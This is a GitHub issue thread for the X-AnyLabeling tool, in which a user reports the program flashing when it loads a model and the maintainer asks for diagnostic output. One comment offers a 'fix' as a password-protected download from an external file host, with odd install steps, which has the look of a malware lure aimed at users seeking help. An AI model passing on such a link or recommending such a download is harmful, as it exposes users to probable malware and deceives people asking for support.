### ISSUE TITLE
It will flash when loading the model.

### ISSUE THREAD

**Issue by junliuchengxia** [CVHub520/X-AnyLabeling#597]
### Search before asking

- [X] I have searched the X-AnyLabeling [issues](https://github.com/CVHub520/X-AnyLabeling/issues) and found no similar bug report.

### Bug

It will flash when loading the model.

### Information

It will flash when loading the model.

### Link to a Reproducible Demonstration Video

It will flash when loading the model.

### Execution Mode

Pre-compiled Executable

### Are you willing to submit a PR?

- [ ] Yes I'd like to help by submitting a PR!

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by junliuchengxia** [comment]
the exe can't open

**Comment by CVHub520** [comment]
> the exe can't open

Please provide the output of python anylabeling/checks.py command to help us diagnose the problem.
